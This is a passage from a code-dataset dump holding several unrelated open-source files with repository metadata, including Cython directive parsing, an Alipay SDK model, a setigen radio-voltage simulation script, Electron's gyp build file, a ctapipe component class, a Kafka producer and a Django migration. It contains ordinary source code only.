ValueError: c_string_type directive must be one of ('bytes', 'str', 'unicode'), got 'unnicode'
"""
type = directive_types.get(name)
if not type: return None
orig_value = value
if type is bool:
value = str(value)
if value == 'True': return True
if value == 'False': return False
if relaxed_bool:
value = value.lower()
if value in ("true", "yes"): return True
elif value in ("false", "no"): return False
raise ValueError("%s directive must be set to True or False, got '%s'" % (
name, orig_value))
elif type is int:
try:
return int(value)
except ValueError:
raise ValueError("%s directive must be set to an integer, got '%s'" % (
name, orig_value))
elif type is str:
return str(value)
elif callable(type):
return type(name, value)
else:
assert False
def parse_directive_list(s, relaxed_bool=False, ignore_unknown=False,
current_settings=None):
"""
Parses a comma-separated list of pragma options. Whitespace
is not considered.
>>> parse_directive_list(' ')
{}
>>> (parse_directive_list('boundscheck=True') ==
... {'boundscheck': True})
True
>>> parse_directive_list(' asdf')
Traceback (most recent call last):
...
ValueError: Expected "=" in option "asdf"
>>> parse_directive_list('boundscheck=hey')
Traceback (most recent call last):
...
ValueError: boundscheck directive must be set to True or False, got 'hey'
>>> parse_directive_list('unknown=True')
Traceback (most recent call last):
...
ValueError: Unknown option: "unknown"
"""
if current_settings is None:
result = {}
else:
result = current_settings
for item in s.split(','):
item = item.strip()
if not item: continue
if not '=' in item: raise ValueError('Expected "=" in option "%s"' % item)
name, value = [ s.strip() for s in item.strip().split('=', 1) ]
parsed_value = parse_directive_value(name, value, relaxed_bool=relaxed_bool)
if parsed_value is None:
if not ignore_unknown:
raise ValueError('Unknown option: "%s"' % name)
else:
result[name] = parsed_value
return result
| 34.572755 | 116 | 0.672696 |
795ae8a0a688faf77f661418b44ce96ae6edc348 | 947 | py | Python | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/domain/AlipayUserAntpaasAddtesttagModifyModel.py | articuly/alipay-sdk-python-all | 0259cd28eca0f219b97dac7f41c2458441d5e7a6 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
class AlipayUserAntpaasAddtesttagModifyModel(object):
def __init__(self):
self._account_no = None
@property
def account_no(self):
return self._account_no
@account_no.setter
def account_no(self, value):
self._account_no = value
def to_alipay_dict(self):
params = dict()
if self.account_no:
if hasattr(self.account_no, 'to_alipay_dict'):
params['account_no'] = self.account_no.to_alipay_dict()
else:
params['account_no'] = self.account_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayUserAntpaasAddtesttagModifyModel()
if 'account_no' in d:
o.account_no = d['account_no']
return o
| 23.097561 | 71 | 0.615628 |
795ae8b7efc092a864a8ec12ba30bdf632f12c26 | 6,596 | py | Python | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | raw_voltage_dev/gen_snr_actual_5min.py | bbrzycki/setigen_development | 37e2c83e70ec8b693be08ecc3957a9a735b2ce5a | [
"MIT"
] | null | null | null | import numpy as np
import blimpy as bl
import pandas as pd
from astropy import units as u
try:
import cupy as xp
except ImportError:
import numpy as xp
import sys, os, glob, errno
import csv
import json
import h5py
import time
from astropy.stats import sigma_clip
from scipy.signal import butter, lfilter, filtfilt
import scipy.signal
sys.path.insert(0, "/home/bryanb/setigen/")
import setigen as stg
def db(x):
""" Convert linear value to dB value """
return 10*np.log10(x)
############################################################
def get_unit_drift_rate(raw_voltage_backend,
fftlength=1048576,
int_factor=1):
df = raw_voltage_backend.chan_bw / fftlength
dt = raw_voltage_backend.tbin * fftlength * int_factor
return df / dt
def get_intensity(snr,
raw_voltage_backend,
fftlength=1048576,
int_factor=1):
dt = raw_voltage_backend.tbin * fftlength * int_factor
tchans = raw_voltage_backend.time_per_block / dt
chi_df = 2 * raw_voltage_backend.num_pols * int_factor
# main_mean = (raw_voltage_backend.requantizer.target_sigma)**2 * chi_df * raw_voltage_backend.filterbank.max_mean_ratio
I_per_SNR = np.sqrt(2 / chi_df) / tchans**0.5
signal_level = 1 / (raw_voltage_backend.num_branches * fftlength / 4)**0.5 * (snr * I_per_SNR)**0.5
return signal_level
############################################################
start = time.time()
sample_rate = 3e9
num_taps = 8
num_branches = 1024
chan_bw = sample_rate/num_branches
digitizer = stg.voltage.RealQuantizer(target_fwhm=32,
num_bits=8)
filterbank = stg.voltage.PolyphaseFilterbank(num_taps=num_taps,
num_branches=num_branches)
requantizer = stg.voltage.ComplexQuantizer(target_fwhm=32,
num_bits=8)
num_pols = 2
# Params for high res data product
fftlength = 1048576
int_factor = 51
antenna = stg.voltage.Antenna(sample_rate=sample_rate,
fch1=0,
ascending=True,
num_pols=num_pols)
rvb = stg.voltage.RawVoltageBackend(antenna,
digitizer=digitizer,
filterbank=filterbank,
requantizer=requantizer,
start_chan=0,
num_chans=64,
block_size=134217728,
blocks_per_file=128,
num_subblocks=16)
# Compute relevant quantities with helper functions above
unit_drift_rate = stg.get_unit_drift_rate(rvb, fftlength, int_factor)
signal_level = stg.get_intensity(10, rvb, fftlength, int_factor)
for stream in antenna.streams:
stream.add_noise(v_mean=0,
v_std=1)
stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(2+0.3-0.5)),
drift_rate=0*u.Hz/u.s,
level=signal_level)
# # stream.add_constant_signal(f_start=chan_bw / fftlength * (int(fftlength*(2+0.6-0.5))),
# # drift_rate=0*u.Hz/u.s,
# # level=signal_level)
for i in range(5):
stream.add_constant_signal(f_start=chan_bw / fftlength * (int(fftlength*(2+0.3-0.5))+20*i),
drift_rate=0*u.Hz/u.s,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.1+int(fftlength*(3+0.3-0.5))),
drift_rate=0*u.Hz/u.s,
level=signal_level * 1/np.sinc(0.1))
stream.add_constant_signal(f_start=chan_bw / fftlength * (20+0.1+int(fftlength*(3+0.3-0.5))),
drift_rate=0*u.Hz/u.s,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.7+int(fftlength*(3+0.6-0.5))),
drift_rate=0*u.Hz/u.s,
level=signal_level * 1/np.sinc(0.3))
stream.add_constant_signal(f_start=chan_bw / fftlength * (20+0.7+int(fftlength*(3+0.6-0.5))),
drift_rate=0*u.Hz/u.s,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(4+0.2-0.5)),
drift_rate=unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.1+int(fftlength*(4+0.6-0.5))),
drift_rate=unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(5+0.2-0.5)),
drift_rate=2*unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(5+0.6-0.5))),
drift_rate=2*unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(7+0.2-0.5)),
drift_rate=4*unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(7+0.6-0.5))),
drift_rate=4*unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * int(fftlength*(9+0.2-0.5)),
drift_rate=8*unit_drift_rate,
level=signal_level)
stream.add_constant_signal(f_start=chan_bw / fftlength * (0.5+int(fftlength*(9+0.6-0.5))),
drift_rate=8*unit_drift_rate,
level=signal_level)
# Record to file
rvb.record(raw_file_stem='/datax/scratch/bbrzycki/data/raw_files/test_snr_actual_5min',
obs_length=300,
length_mode='obs_length',
header_dict={'HELLO': 'test_value',
'TELESCOP': 'GBT'})
print(time.time() - start)
print(rvb.total_obs_num_samples)
print(rvb.sample_stage, rvb.digitizer_stage, rvb.filterbank_stage, rvb.requantizer_stage) | 34.354167 | 124 | 0.549727 |
795ae97e9f0c61b67515bd6d01742c217f18d68a | 16,969 | gyp | Python | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | 1 | 2016-11-07T16:43:43.000Z | 2016-11-07T16:43:43.000Z | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | null | null | null | atom.gyp | sencha/electron | 71598e15bf0ca2fd8de338d864cc37776608c6c2 | [
"MIT"
] | 2 | 2015-07-18T09:31:03.000Z | 2019-12-24T09:55:03.000Z | {
'variables': {
'project_name%': 'electron',
'product_name%': 'Electron',
'company_name%': 'GitHub, Inc',
'company_abbr%': 'github',
'version%': '0.27.3',
'atom_source_root': '<!(["python", "tools/atom_source_root.py"])',
},
'includes': [
'filenames.gypi',
'vendor/native_mate/native_mate_files.gypi',
],
'target_defaults': {
'defines': [
'ATOM_PRODUCT_NAME="<(product_name)"',
'ATOM_PROJECT_NAME="<(project_name)"',
],
'mac_framework_dirs': [
'<(atom_source_root)/external_binaries',
],
},
'targets': [
{
'target_name': '<(project_name)',
'type': 'executable',
'dependencies': [
'compile_coffee',
'<(project_name)_lib',
],
'sources': [
'<@(app_sources)',
],
'include_dirs': [
'.',
],
'conditions': [
['OS=="mac"', {
'product_name': '<(product_name)',
'mac_bundle': 1,
'dependencies!': [
'<(project_name)_lib',
],
'dependencies': [
'<(project_name)_framework',
'<(project_name)_helper',
'vendor/breakpad/breakpad.gyp:dump_syms',
],
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name)',
'INFOPLIST_FILE': 'atom/browser/resources/mac/Info.plist',
'LD_RUNPATH_SEARCH_PATHS': [
'@executable_path/../Frameworks',
],
},
'mac_bundle_resources': [
'<@(bundle_sources)',
],
'copies': [
{
'destination': '<(PRODUCT_DIR)/<(product_name).app/Contents/Frameworks',
'files': [
'<(PRODUCT_DIR)/<(product_name) Helper.app',
'<(PRODUCT_DIR)/<(product_name) Framework.framework',
'external_binaries/Squirrel.framework',
'external_binaries/ReactiveCocoa.framework',
'external_binaries/Mantle.framework',
],
},
{
'destination': '<(PRODUCT_DIR)/<(product_name).app/Contents/Resources',
'files': [
'atom/browser/default_app',
],
},
],
'postbuilds': [
{
# This postbuid step is responsible for creating the following
# helpers:
#
# <(product_name) EH.app and <(product_name) NP.app are created
# from <(product_name).app.
#
# The EH helper is marked for an executable heap. The NP helper
# is marked for no PIE (ASLR).
'postbuild_name': 'Make More Helpers',
'action': [
'vendor/brightray/tools/mac/make_more_helpers.sh',
'Frameworks',
'<(product_name)',
],
},
# The application doesn't have real localizations, it just has
# empty .lproj directories, which is enough to convince Cocoa
# atom-shell supports those languages.
{
'postbuild_name': 'Make Empty Localizations',
'variables': {
'apply_locales_cmd': ['python', 'tools/mac/apply_locales.py'],
'locale_dirs': [
'>!@(<(apply_locales_cmd) -d ZZLOCALE.lproj <(locales))',
],
},
'action': [
'tools/mac/make_locale_dirs.sh',
'<@(locale_dirs)',
],
},
]
}, { # OS=="mac"
'dependencies': [
'make_locale_paks',
],
}], # OS!="mac"
['OS=="win"', {
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(libchromiumcontent_dir)/pdf.dll',
],
}],
],
},
'destination': '<(PRODUCT_DIR)',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/ffmpegsumo.dll',
'<(libchromiumcontent_dir)/libEGL.dll',
'<(libchromiumcontent_dir)/libGLESv2.dll',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/content_resources_200_percent.pak',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/ui_resources_200_percent.pak',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
'external_binaries/d3dcompiler_47.dll',
'external_binaries/xinput1_3.dll',
'external_binaries/msvcp120.dll',
'external_binaries/msvcr120.dll',
'external_binaries/vccorlib120.dll',
],
},
{
'destination': '<(PRODUCT_DIR)/resources',
'files': [
'atom/browser/default_app',
]
},
],
}], # OS=="win"
['OS=="linux"', {
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<(PRODUCT_DIR)/lib/libnode.so',
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(PRODUCT_DIR)/lib/libnode.so',
],
}],
],
},
'destination': '<(PRODUCT_DIR)',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/libffmpegsumo.so',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
],
},
{
'destination': '<(PRODUCT_DIR)/resources',
'files': [
'atom/browser/default_app',
]
},
],
}], # OS=="linux"
],
}, # target <(project_name)
{
'target_name': '<(project_name)_lib',
'type': 'static_library',
'dependencies': [
'atom_coffee2c',
'vendor/brightray/brightray.gyp:brightray',
'vendor/node/node.gyp:node',
],
'defines': [
# This is defined in skia/skia_common.gypi.
'SK_SUPPORT_LEGACY_GETTOPDEVICE',
# Disable warnings for g_settings_list_schemas.
'GLIB_DISABLE_DEPRECATION_WARNINGS',
# Defined in Chromium but not exposed in its gyp file.
'V8_USE_EXTERNAL_STARTUP_DATA',
'ENABLE_PLUGINS',
# Needed by Node.
'NODE_WANT_INTERNALS=1',
],
'sources': [
'<@(lib_sources)',
],
'include_dirs': [
'.',
'chromium_src',
'vendor/brightray',
'vendor/native_mate',
# Include atom_natives.h.
'<(SHARED_INTERMEDIATE_DIR)',
# Include directories for uv and node.
'vendor/node/src',
'vendor/node/deps/http_parser',
'vendor/node/deps/uv/include',
# The `node.h` is using `#include"v8.h"`.
'<(libchromiumcontent_src_dir)/v8/include',
# The `node.h` is using `#include"ares.h"`.
'vendor/node/deps/cares/include',
# The `third_party/WebKit/Source/platform/weborigin/SchemeRegistry.h` is using `platform/PlatformExport.h`.
'<(libchromiumcontent_src_dir)/third_party/WebKit/Source',
],
'direct_dependent_settings': {
'include_dirs': [
'.',
],
},
'export_dependent_settings': [
'vendor/brightray/brightray.gyp:brightray',
],
'conditions': [
['libchromiumcontent_component', {
'link_settings': {
'libraries': [ '<@(libchromiumcontent_v8_libraries)' ],
},
}],
['OS=="win"', {
'sources': [
'<@(lib_sources_win)',
],
'link_settings': {
'libraries': [
'-limm32.lib',
'-loleacc.lib',
'-lComdlg32.lib',
'-lWininet.lib',
],
},
'dependencies': [
# Node is built as static_library on Windows, so we also need to
# include its dependencies here.
'vendor/node/deps/cares/cares.gyp:cares',
'vendor/node/deps/http_parser/http_parser.gyp:http_parser',
'vendor/node/deps/uv/uv.gyp:libuv',
'vendor/node/deps/zlib/zlib.gyp:zlib',
# Build with breakpad support.
'vendor/breakpad/breakpad.gyp:breakpad_handler',
'vendor/breakpad/breakpad.gyp:breakpad_sender',
],
}], # OS=="win"
['OS=="mac"', {
'dependencies': [
'vendor/crashpad/client/client.gyp:crashpad_client',
'vendor/crashpad/handler/handler.gyp:crashpad_handler',
],
}], # OS=="mac"
['OS=="linux"', {
'link_settings': {
'ldflags': [
# Make binary search for libraries under current directory, so we
# don't have to manually set $LD_LIBRARY_PATH:
# http://serverfault.com/questions/279068/cant-find-so-in-the-same-directory-as-the-executable
'-rpath \$$ORIGIN',
# Make native module dynamic loading work.
'-rdynamic',
],
},
# Required settings of using breakpad.
'cflags_cc': [
'-Wno-empty-body',
'-Wno-reserved-user-defined-literal',
],
'include_dirs': [
'vendor/breakpad/src',
],
'dependencies': [
'vendor/breakpad/breakpad.gyp:breakpad_client',
],
}], # OS=="linux"
],
}, # target <(product_name)_lib
{
'target_name': 'compile_coffee',
'type': 'none',
'actions': [
{
'action_name': 'compile_coffee',
'variables': {
'conditions': [
['OS=="mac"', {
'resources_path': '<(PRODUCT_DIR)/<(product_name).app/Contents/Resources',
},{
'resources_path': '<(PRODUCT_DIR)/resources',
}],
],
},
'inputs': [
'<@(coffee_sources)',
],
'outputs': [
'<(resources_path)/atom.asar',
],
'action': [
'python',
'tools/coffee2asar.py',
'<@(_outputs)',
'<@(_inputs)',
],
}
],
}, # target compile_coffee
{
'target_name': 'atom_coffee2c',
'type': 'none',
'actions': [
{
'action_name': 'atom_coffee2c',
'inputs': [
'<@(coffee2c_sources)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/atom_natives.h',
],
'action': [
'python',
'tools/coffee2c.py',
'<@(_outputs)',
'<@(_inputs)',
],
}
],
}, # target atom_coffee2c
],
'conditions': [
['OS=="mac"', {
'targets': [
{
'target_name': '<(project_name)_framework',
'product_name': '<(product_name) Framework',
'type': 'shared_library',
'dependencies': [
'<(project_name)_lib',
],
'sources': [
'<@(framework_sources)',
],
'include_dirs': [
'.',
'vendor',
'<(libchromiumcontent_src_dir)',
],
'export_dependent_settings': [
'<(project_name)_lib',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Carbon.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'external_binaries/Squirrel.framework',
'external_binaries/ReactiveCocoa.framework',
'external_binaries/Mantle.framework',
],
},
'mac_bundle': 1,
'mac_bundle_resources': [
'atom/common/resources/mac/MainMenu.xib',
'<(libchromiumcontent_dir)/content_shell.pak',
'<(libchromiumcontent_dir)/icudtl.dat',
'<(libchromiumcontent_dir)/natives_blob.bin',
'<(libchromiumcontent_dir)/snapshot_blob.bin',
],
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name).framework',
'INFOPLIST_FILE': 'atom/common/resources/mac/Info.plist',
'LD_DYLIB_INSTALL_NAME': '@rpath/<(product_name) Framework.framework/<(product_name) Framework',
'LD_RUNPATH_SEARCH_PATHS': [
'@loader_path/Libraries',
],
'OTHER_LDFLAGS': [
'-ObjC',
],
},
'copies': [
{
'variables': {
'conditions': [
['libchromiumcontent_component', {
'copied_libraries': [
'<(PRODUCT_DIR)/libnode.dylib',
'<@(libchromiumcontent_shared_libraries)',
'<@(libchromiumcontent_shared_v8_libraries)',
],
}, {
'copied_libraries': [
'<(PRODUCT_DIR)/libnode.dylib',
],
}],
],
},
'destination': '<(PRODUCT_DIR)/<(product_name) Framework.framework/Versions/A/Libraries',
'files': [
'<@(copied_libraries)',
'<(libchromiumcontent_dir)/ffmpegsumo.so',
],
},
{
'destination': '<(PRODUCT_DIR)/<(product_name) Framework.framework/Versions/A/Resources',
'files': [
'<(PRODUCT_DIR)/crashpad_handler',
],
},
],
'postbuilds': [
{
'postbuild_name': 'Fix path of libnode',
'action': [
'install_name_tool',
'-change',
'/usr/local/lib/libnode.dylib',
'@rpath/libnode.dylib',
'${BUILT_PRODUCTS_DIR}/<(product_name) Framework.framework/Versions/A/<(product_name) Framework',
],
},
{
'postbuild_name': 'Add symlinks for framework subdirectories',
'action': [
'tools/mac/create-framework-subdir-symlinks.sh',
'<(product_name) Framework',
'Libraries',
],
},
],
}, # target framework
{
'target_name': '<(project_name)_helper',
'product_name': '<(product_name) Helper',
'type': 'executable',
'dependencies': [
'<(project_name)_framework',
],
'sources': [
'<@(app_sources)',
],
'include_dirs': [
'.',
],
'mac_bundle': 1,
'xcode_settings': {
'ATOM_BUNDLE_ID': 'com.<(company_abbr).<(project_name).helper',
'INFOPLIST_FILE': 'atom/renderer/resources/mac/Info.plist',
'LD_RUNPATH_SEARCH_PATHS': [
'@executable_path/../../..',
],
},
}, # target helper
],
}, { # OS=="mac"
'targets': [
{
'target_name': 'make_locale_paks',
'type': 'none',
'actions': [
{
'action_name': 'Make Empty Paks',
'inputs': [
'tools/make_locale_paks.py',
],
'outputs': [
'<(PRODUCT_DIR)/locales'
],
'action': [
'python',
'tools/make_locale_paks.py',
'<(PRODUCT_DIR)',
'<@(locales)',
],
'msvs_cygwin_shell': 0,
},
],
},
],
}], # OS!="mac"
],
}
| 33.207436 | 115 | 0.45813 |
795aea1c587f002b64fb153a12fcd6d72b59591f | 5,202 | py | Python | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | ctapipe/core/component.py | Pluto9th/ctapipe | 8c4faa674a1949210cbda8cb9e2413dd6362afea | [
"BSD-3-Clause"
] | null | null | null | """ Class to handle configuration for algorithms """
from abc import ABCMeta
from logging import getLogger
from inspect import isabstract
from traitlets.config import Configurable
from traitlets import TraitError
from ctapipe.core.plugins import detect_and_import_io_plugins
def non_abstract_children(base):
"""
Return all non-abstract subclasses of a base class recursively.
Parameters
----------
base : class
High level class object that is inherited by the
desired subclasses
Returns
-------
non_abstract : dict
dict of all non-abstract subclasses
"""
subclasses = base.__subclasses__() + [
g for s in base.__subclasses__()
for g in non_abstract_children(s)
]
non_abstract = [g for g in subclasses if not isabstract(g)]
return non_abstract
class AbstractConfigurableMeta(type(Configurable), ABCMeta):
'''
Metaclass to be able to make Component abstract
see: http://stackoverflow.com/a/7314847/3838691
'''
pass
class Component(Configurable, metaclass=AbstractConfigurableMeta):
"""Base class of all Components.
Components are classes that are configurable via traitlets
and setup a logger in the ctapipe logging hierarchy.
`traitlets` can validate values and provide defaults and
descriptions. These will be automatically translated into
configuration parameters (command-line, config file, etc). Note
that any parameter that should be externally configurable must
have its `config` attribute set to `True`, e.g. defined like
`myparam = Integer(0, help='the parameter').tag(config=True)`.
All components also contain a `logger` instance in their `log`
attribute, that you must use to output info, debugging data,
warnings, etc (do not use `print()` statements, instead use
`self.log.info()`, `self.log.warn()`, `self.log.debug()`, etc).
Components are generally used within `ctapipe.core.Tool`
subclasses, which provide configuration handling and command-line
tool generation.
For example:
.. code:: python
from ctapipe.core import Component
from traitlets import (Integer, Float)
class MyComponent(Component):
\"\"\" Does something \"\"\"
some_option = Integer(default_value=6,
help='a value to set').tag(config=True)
comp = MyComponent()
comp.some_option = 6 # ok
comp.some_option = 'test' # will fail validation
"""
def __init__(self, config=None, parent=None, **kwargs):
"""
Parameters
----------
config : traitlets.loader.Config
Configuration specified by config file or cmdline arguments.
Used to set traitlet values.
parent: Tool or Component
If a Component is created by another Component or Tool,
you need to pass the creating Component as parent, e.g.
`parent=self`. This makes sure the config is correctly
handed down to the child components.
Do not pass config in this case.
kwargs
Traitlets to be overridden.
TraitError is raised if kwargs contains a key that does not
correspond to a traitlet.
"""
if parent is not None and config is not None:
raise ValueError(
'Only one of `config` or `parent` allowed'
' If you create a Component as part of another, give `parent=self`'
' and not `config`'
)
super().__init__(parent=parent, config=config, **kwargs)
for key, value in kwargs.items():
if not self.has_trait(key):
raise TraitError(f"Traitlet does not exist: {key}")
# set up logging
if self.parent:
self.log = self.parent.log.getChild(self.__class__.__name__)
else:
self.log = getLogger(
self.__class__.__module__ + '.' + self.__class__.__name__
)
@classmethod
def from_name(cls, name, config=None, parent=None):
"""
Obtain an instance of a subclass via its name
Parameters
----------
name : str
Name of the subclass to obtain
config : traitlets.loader.Config
Configuration specified by config file or cmdline arguments.
Used to set traitlet values.
This argument is typically only specified when using this method
from within a Tool.
tool : ctapipe.core.Tool
Tool executable that is calling this component.
Passes the correct logger to the component.
This argument is typically only specified when using this method
from within a Tool.
Returns
-------
instace
Instance of subclass to this class
"""
detect_and_import_io_plugins()
subclasses = {
base.__name__: base
for base in non_abstract_children(cls)
}
requested_subclass = subclasses[name]
return requested_subclass(config=config, parent=parent)
| 34.223684 | 83 | 0.629566 |
795aec7d72bb2453d7dfdf2f1f588fb1376e239c | 1,050 | py | Python | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | null | null | null | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | 1 | 2019-01-28T13:40:56.000Z | 2019-01-28T13:40:56.000Z | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | null | null | null | import random
import time
from kafka import KafkaProducer
from kafka.errors import KafkaError
producer = KafkaProducer(bootstrap_servers='localhost:9092')
topic = "power"
for i in range(1000):
AT = "19.651231"
V = "54.305804"
AP = "1013.259078"
RH = "73.308978"
# AT V AP RH
# min 1.810000 25.360000 992.890000 25.560000
# max 37.110000 81.560000 1033.300000 100.160000
def getAT():
return str(round(random.uniform(2.0, 38.0),2))
def getV():
return str(round(random.uniform(26.0, 81.5),2))
def getAP():
return str(round(random.uniform(993.0, 1033.0),2))
def getRH():
return str(round(random.uniform(26.0, 101.0),2))
message = "{\"AT\" : " + getAT() + "," + "\"V\" : " +getV() + "," + "\"AP\" : " +getAP() + "," + "\"RH\" : " + getRH() + "}"
producer.send(topic, key=str.encode('key_{}'.format(i)), value=(message.encode('utf-8')))
time.sleep(1)
producer.close()
| 27.631579 | 129 | 0.539048 |
795aecdfcea614d789c5bc1ff0e29ac8c8f242b3 | 1,552 | py | Python | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | null | null | null | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | null | null | null | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | 1 | 2019-07-18T11:23:49.000Z | 2019-07-18T11:23:49.000Z | import pagerank
from copy import deepcopy
def query(dictionary, text, pagerank, terms, indices):
incidence = []
for i in range(len(terms)):
term = terms[i].lower()
incidence.append([])
# Loop over the anchors
for anchor in dictionary:
if term in anchor.lower().split(" "):
for document in dictionary[anchor]:
if document not in incidence[i]:
incidence[i].append(document)
# Loop over the plain text
for data in text:
if term in data.lower().split(" "):
for document in text[data]:
if document not in incidence[i]:
incidence[i].append(document)
# Find the smallest list
minimum = 999999999999999999
index = 0
for i in range(len(incidence)):
if len(incidence[i]) < minimum:
minimum = len(incidence[i])
index = i
result = deepcopy(incidence[index])
# Find all the matching documents
for term in incidence[index]:
for j in range(len(incidence)):
# Remove the term since it's not in all documents
if term not in incidence[j]:
result.remove(term)
break
# Sort based on pagerank
result.sort(key=lambda x: pagerank[indices[x]], reverse=True)
# Return the top 10
return result[0:10]
def perform_query(dictionary, text, pr, terms, indices):
result = query(dictionary, text, pr, terms, indices)
return result
| 32.333333 | 65 | 0.576031 |
795aee0789d0870aa0190388a53c4d4f112a3deb | 343 | py | Python | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from future.utils import PY3
if PY3:
from tkinter.simpledialog import *
else:
try:
from SimpleDialog import *
except ImportError:
raise ImportError('The SimpleDialog module is missing. Does your Py2 '
'installation include tkinter?')
| 24.5 | 79 | 0.64723 |
795aee68e75c117305753eaefee072b83d35e7d7 | 991 | py | Python | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-30 05:46
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='UserAuth',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.user')),
('active', models.BooleanField(default=False)),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
bases=('auth.user',),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
| 29.147059 | 184 | 0.569122 |
795aef5e54c6aae3899a01a8379b2b94656e5b0e | 2,481 | py | Python | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
